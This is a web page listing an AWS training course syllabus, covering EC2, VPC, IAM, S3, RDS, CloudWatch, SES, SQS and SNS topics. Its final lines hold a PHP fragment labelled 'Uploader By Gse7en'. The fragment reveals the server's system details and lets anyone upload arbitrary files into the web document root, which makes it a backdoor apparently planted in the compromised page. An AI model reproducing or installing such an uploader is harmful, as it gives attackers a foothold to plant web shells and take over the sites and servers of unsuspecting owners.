AWS Online Training Institute

What is Cloud
Why Cloud?
Types of Cloud Deployment Models
Types of Cloud Services
Future of Cloud Technologies
Advantages and Disadvantages of Cloud

 

What is AWS?
How to Subscribe for AWS Account
What is the AWS Free Usage Tier
AWS Certification
Introducation to the AWS Management Console
List of services given by AWS

What is Amazon EC2?
Features of Amazon EC2
Managing the EC2 infrastructure
EC2 Dashboard
Pricing for Amazon EC2

Describibg Regions
Avaialability Zones, and Endpoints
Managing instances in an Availability Zone

Managing AMIs
Working with Windows, Linux AMIs
Shared and paid AMI
Making an AMI Public

  • Instance Type
    Instance life cycle
  • Differences between reboot, stop, and terminate 
  • Building and EC2 Windows linux instances 
  • To install Instance in public and private subnet
  • Security via Key pairs 
  • EC2 Class and VPC Security Groups 
  • Managing Elastic IP’s
  • Pricing model in EC2 Instances
  • EC2 with Amazon command line Interface

 

  • Features of Amazon EBS
  • Amazon EBS volumes
  • Managing EBS volumes
  • Increasing the volume size
  • Amazon EBS snapshot 
  • Creating a load balancer
  • Internal and external load balancer 
  • Load balancing protocols 
  • Security groups for the load balancer
  • Health check for the load balancer
  • Cross-zone load balancing
  • Connection Draining
  • What is auto scaling?
  • Auto scaling components
  • Creation of launch configuration
  • Configuration of auto scaling policies
  • Advantages of using auto scaling with ELB
  • Security Groups 
  • Elastic  IPs
  • Placement Groups 
  • Key Pairs 
  • Network Interfaces

Amazon Virtual Private Cloud (VPC)

  • What is Amazon VPC?
  • VPC Essentials
  • Default and Nondefault VPC
  • VPC Networking and ACL
  • Security Groups
  • DNS and DHCP Options Sets 
  • VPC Peering and Endpoints
  • Subnet Routing 
  • VPC Internet Gateway 
  • Elastic IP addresses and network interfaces 
  • VPC integration with many other AWS services 
  • Creating a NAT instance in a VPC
  • Configuring a Web application in VPC 
  • Pricing for Amazon VPC
  • Route 53 as your DNS service 
  • Using Traffic flow 
  • Route 53 Health Checks 
  • Configuring DNS Failover
  • Latency Based Routing 
  • Weighted Routing Polices
  • Hosting Web Portal using Route 53 
  • Bucket Policies

Identity Access Management (IAM)

  • IAM Features 
  • Getting Started with IAM
  • Creation of user, groups, roles 
  • Managing &Writing Policies
  • Credential Report 
  • IAM Console and the Sign-in Page

Amazon S3

  • What is object Storage?
  • Data as objects
  • Lifecycles of S3
  • Managing Buckets 
  • Accessing S3 storage via tools 
  • Creation of a static website using S3 storage 

Relational Database Services (RDS)

  • RDS Essentials 
  • Launching RDS instance 
  • Selecting the Engine 
  • Configuring the Database Engine
  • Managing RDS Database 
  • Setting up automatic backups
  • Authorizing access to the DB

 

  • Amazon Cloud Watch Architecture 
  • List of services monitored by Cloud Watch 
  • Collect and track metrics
  • Monitoring logs, Graphs
  • Set Alarms
  • Building AWS infrastructure as a code 
  • Design a template 
  • Create a Stack
  • Create a Template from your Existing Resources 
  • Introduction to JSON

Amazon Simple Email Services (SES)

  • Simple email service overview
  • Configuring Amazon email service 
  • Amazon SES and deliverability 
  • Amazon SES Email- Sending Process
  • Email format and Limits of SES

 

  • Simple Queue service overview
  • SQS for background work task
  • Creating a Queue 
  • Confirming the Queue exists
  • Add a permission to the Queue
  • Simple Notification Service overview
  • SNS architecture
  • Publishers and subscribers 
  • Creation of a topic
  • Subscribing to topic via Email
  • Setting notification for EC2 instance changes 
Uploader By Gse7en
"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } ?>